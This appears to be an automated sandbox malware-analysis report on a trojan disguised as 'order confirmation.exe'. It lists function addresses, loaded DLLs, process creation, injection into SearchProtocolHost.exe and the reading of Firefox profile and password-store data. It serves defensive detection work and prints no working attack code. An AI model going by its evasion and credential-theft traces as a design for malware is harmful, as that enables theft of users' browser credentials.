Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013B0CF2 | 4_2_013B0CF2
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01460CB5 | 4_2_01460CB5
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01434F40 | 4_2_01434F40
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013E0F30 | 4_2_013E0F30
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01402F28 | 4_2_01402F28
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01462F30 | 4_2_01462F30
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013CCFE0 | 4_2_013CCFE0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0143EFA0 | 4_2_0143EFA0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013B2FC8 | 4_2_013B2FC8
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0147EE26 | 4_2_0147EE26
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C0E59 | 4_2_013C0E59
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0147EEDB | 4_2_0147EEDB
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013D2E90 | 4_2_013D2E90
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0147CE93 | 4_2_0147CE93
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0148B16B | 4_2_0148B16B
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013AF172 | 4_2_013AF172
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013F516C | 4_2_013F516C
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013CB1B0 | 4_2_013CB1B0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0146F0CC | 4_2_0146F0CC
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0147F0E0 | 4_2_0147F0E0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_014770E9 | 4_2_014770E9
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C70C0 | 4_2_013C70C0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0147132D | 4_2_0147132D
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013AD34C | 4_2_013AD34C
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0140739A | 4_2_0140739A
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C52A0 | 4_2_013C52A0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_014612ED | 4_2_014612ED
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013DB2C0 | 4_2_013DB2C0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01477571 | 4_2_01477571
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0145D5B0 | 4_2_0145D5B0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013B1460 | 4_2_013B1460
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0147F43F | 4_2_0147F43F
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0147F7B0 | 4_2_0147F7B0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_014716CC | 4_2_014716CC
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01455910 | 4_2_01455910
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C9950 | 4_2_013C9950
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013DB950 | 4_2_013DB950
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0142D800 | 4_2_0142D800
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C38E0 | 4_2_013C38E0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0147FB76 | 4_2_0147FB76
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01435BF0 | 4_2_01435BF0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013DFB80 | 4_2_013DFB80
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013FDBF9 | 4_2_013FDBF9
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01477A46 | 4_2_01477A46
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0147FA49 | 4_2_0147FA49
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01433A6C | 4_2_01433A6C
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0146DAC6 | 4_2_0146DAC6
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01405AA0 | 4_2_01405AA0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01461AA3 | 4_2_01461AA3
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0145DAAC | 4_2_0145DAAC
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01471D5A | 4_2_01471D5A
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01477D73 | 4_2_01477D73
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C3D40 | 4_2_013C3D40
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013DFDC0 | 4_2_013DFDC0
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_01439C32 | 4_2_01439C32
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0147FCF2 | 4_2_0147FCF2
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0147FF09 | 4_2_0147FF09
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C1F92 | 4_2_013C1F92
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_0147FFB1 | 4_2_0147FFB1
Source: C:\Users\user\Desktop\order confirmation.exe | Code function: 4_2_013C9EB0 | 4_2_013C9EB0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035DA352 | 9_2_035DA352
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_0352E3F0 | 9_2_0352E3F0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035E03E6 | 9_2_035E03E6
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035C0274 | 9_2_035C0274
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035A02C0 | 9_2_035A02C0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035A8158 | 9_2_035A8158
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035BA118 | 9_2_035BA118
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03510100 | 9_2_03510100
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035D81CC | 9_2_035D81CC
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035E01AA | 9_2_035E01AA
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035D41A2 | 9_2_035D41A2
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035B2000 | 9_2_035B2000
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03544750 | 9_2_03544750
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03520770 | 9_2_03520770
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_0351C7C0 | 9_2_0351C7C0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_0353C6E0 | 9_2_0353C6E0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03520535 | 9_2_03520535
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035E0591 | 9_2_035E0591
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035D2446 | 9_2_035D2446
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035C4420 | 9_2_035C4420
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035CE4F6 | 9_2_035CE4F6
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035DAB40 | 9_2_035DAB40
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035D6BD7 | 9_2_035D6BD7
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_0351EA80 | 9_2_0351EA80
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03536962 | 9_2_03536962
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035229A0 | 9_2_035229A0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035EA9A6 | 9_2_035EA9A6
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03522840 | 9_2_03522840
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_0352A840 | 9_2_0352A840
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_0354E8F0 | 9_2_0354E8F0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035068B8 | 9_2_035068B8
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03594F40 | 9_2_03594F40
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03540F30 | 9_2_03540F30
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035C2F30 | 9_2_035C2F30
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03562F28 | 9_2_03562F28
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03512FC8 | 9_2_03512FC8
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_0352CFE0 | 9_2_0352CFE0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_0359EFA0 | 9_2_0359EFA0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03520E59 | 9_2_03520E59
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035DEE26 | 9_2_035DEE26
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035DEEDB | 9_2_035DEEDB
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03532E90 | 9_2_03532E90
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035DCE93 | 9_2_035DCE93
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035BCD1F | 9_2_035BCD1F
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_0352AD00 | 9_2_0352AD00
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_0351ADE0 | 9_2_0351ADE0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03538DBF | 9_2_03538DBF
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03520C00 | 9_2_03520C00
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03510CF2 | 9_2_03510CF2
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035C0CB5 | 9_2_035C0CB5
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_0350D34C | 9_2_0350D34C
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035D132D | 9_2_035D132D
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_0356739A | 9_2_0356739A
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_0353B2C0 | 9_2_0353B2C0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035C12ED | 9_2_035C12ED
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035252A0 | 9_2_035252A0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_0350F172 | 9_2_0350F172
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035EB16B | 9_2_035EB16B
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_0355516C | 9_2_0355516C
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_0352B1B0 | 9_2_0352B1B0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035CF0CC | 9_2_035CF0CC
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035270C0 | 9_2_035270C0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035D70E9 | 9_2_035D70E9
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035DF0E0 | 9_2_035DF0E0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035DF7B0 | 9_2_035DF7B0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_03565630 | 9_2_03565630
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035D16CC | 9_2_035D16CC
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035D7571 | 9_2_035D7571
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_035E95C3 | 9_2_035E95C3
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035BD5B09_2_035BD5B0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035114609_2_03511460
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035DF43F9_2_035DF43F
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035DFB769_2_035DFB76
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03595BF09_2_03595BF0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_0355DBF99_2_0355DBF9
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_0353FB809_2_0353FB80
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035DFA499_2_035DFA49
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035D7A469_2_035D7A46
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03593A6C9_2_03593A6C
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035CDAC69_2_035CDAC6
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03565AA09_2_03565AA0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035BDAAC9_2_035BDAAC
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035C1AA39_2_035C1AA3
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035299509_2_03529950
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_0353B9509_2_0353B950
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035B59109_2_035B5910
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_0358D8009_2_0358D800
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035238E09_2_035238E0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035DFF099_2_035DFF09
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_034E3FD59_2_034E3FD5
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_034E3FD29_2_034E3FD2
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03521F929_2_03521F92
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035DFFB19_2_035DFFB1
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03529EB09_2_03529EB0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035D1D5A9_2_035D1D5A
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03523D409_2_03523D40
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035D7D739_2_035D7D73
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_0353FDC09_2_0353FDC0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_03599C329_2_03599C32
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035DFCF29_2_035DFCF2
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009F20109_2_009F2010
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009ECF009_2_009ECF00
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009EB1169_2_009EB116
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009EB1209_2_009EB120
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009ED1209_2_009ED120
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009EB2709_2_009EB270
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009EB2649_2_009EB264
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009EB3389_2_009EB338
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009F56909_2_009F5690
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009F38909_2_009F3890
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_00A0BCD09_2_00A0BCD0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_033CE3589_2_033CE358
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_033CE4739_2_033CE473
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_033CCB359_2_033CCB35
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_033CCB789_2_033CCB78
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_033CE80E9_2_033CE80E
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_033CD8D89_2_033CD8D8
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: String function: 0358EA12 appears 86 times
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: String function: 0350B970 appears 280 times
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: String function: 03567E54 appears 111 times
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: String function: 03555130 appears 58 times
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: String function: 0359F290 appears 105 times
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: String function: 01407E54 appears 102 times
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: String function: 013F5130 appears 58 times
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: String function: 0142EA12 appears 86 times
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: String function: 0143F290 appears 105 times
                Source: C:\Users\user\Desktop\order confirmation.exe | Code function: String function: 013AB970 appears 280 times
                Source: order confirmation.exe | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                Source: order confirmation.exe, 00000000.00000002.1654846617.0000000001854000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameaGAv.exe vs order confirmation.exe
                Source: order confirmation.exe, 00000000.00000002.1654846617.000000000179E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs order confirmation.exe
                Source: order confirmation.exe, 00000000.00000002.1661314025.0000000005EB0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs order confirmation.exe
                Source: order confirmation.exe, 00000000.00000002.1669177106.0000000007E60000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs order confirmation.exe
                Source: order confirmation.exe, 00000000.00000000.1564852727.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameaGAv.exe4 vs order confirmation.exe
                Source: order confirmation.exe, 00000000.00000002.1655731577.000000000358B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs order confirmation.exe
                Source: order confirmation.exe, 00000004.00000002.1983329477.00000000014AD000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs order confirmation.exe
                Source: order confirmation.exe | Binary or memory string: OriginalFilenameaGAv.exe4 vs order confirmation.exe
                Source: order confirmation.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: order confirmation.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.order confirmation.exe.4626688.1.raw.unpack, wbVUabtqW87IewAOlm.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, pdPLqmV7ftO3csrOSh.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, pdPLqmV7ftO3csrOSh.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, pdPLqmV7ftO3csrOSh.cs | Security API names: _0020.AddAccessRule
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, wbVUabtqW87IewAOlm.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.order confirmation.exe.4626688.1.raw.unpack, pdPLqmV7ftO3csrOSh.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.order confirmation.exe.4626688.1.raw.unpack, pdPLqmV7ftO3csrOSh.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.order confirmation.exe.4626688.1.raw.unpack, pdPLqmV7ftO3csrOSh.cs | Security API names: _0020.AddAccessRule
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@9/2@7/5
                Source: C:\Users\user\Desktop\order confirmation.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\order confirmation.exe.log
                Source: C:\Users\user\Desktop\order confirmation.exe | Mutant created: NULL
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | File created: C:\Users\user\AppData\Local\Temp\sE716IK71M
                Source: order confirmation.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: order confirmation.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\order confirmation.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: SearchProtocolHost.exe, 00000009.00000002.2818884774.0000000003009000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000003.2183412812.0000000002FD4000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000002.2818884774.0000000002FD4000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000003.2183412812.0000000003009000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: order confirmation.exe | ReversingLabs: Detection: 63%
                Source: unknown | Process created: C:\Users\user\Desktop\order confirmation.exe "C:\Users\user\Desktop\order confirmation.exe"
                Source: C:\Users\user\Desktop\order confirmation.exe | Process created: C:\Users\user\Desktop\order confirmation.exe "C:\Users\user\Desktop\order confirmation.exe"
                Source: C:\Users\user\Desktop\order confirmation.exe | Process created: C:\Users\user\Desktop\order confirmation.exe "C:\Users\user\Desktop\order confirmation.exe"
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe | Process created: C:\Windows\SysWOW64\SearchProtocolHost.exe "C:\Windows\SysWOW64\SearchProtocolHost.exe"
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\order confirmation.exe | Process created: C:\Users\user\Desktop\order confirmation.exe "C:\Users\user\Desktop\order confirmation.exe"
                Source: C:\Users\user\Desktop\order confirmation.exe | Process created: C:\Users\user\Desktop\order confirmation.exe "C:\Users\user\Desktop\order confirmation.exe"
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe | Process created: C:\Windows\SysWOW64\SearchProtocolHost.exe "C:\Windows\SysWOW64\SearchProtocolHost.exe"
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\order confirmation.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\order confirmation.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\order confirmation.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\order confirmation.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\order confirmation.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\order confirmation.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\order confirmation.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\order confirmation.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\order confirmation.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\order confirmation.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\order confirmation.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\order confirmation.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\order confirmation.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\order confirmation.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\order confirmation.exe | Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\order confirmation.exe | Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\order confirmation.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\order confirmation.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\order confirmation.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\order confirmation.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\order confirmation.exe | Section loaded: iconcodecservice.dll
                Source: C:\Users\user\Desktop\order confirmation.exe | Section loaded: textshaping.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Section loaded: tquery.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Section loaded: cryptdll.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Section loaded: mlang.dll
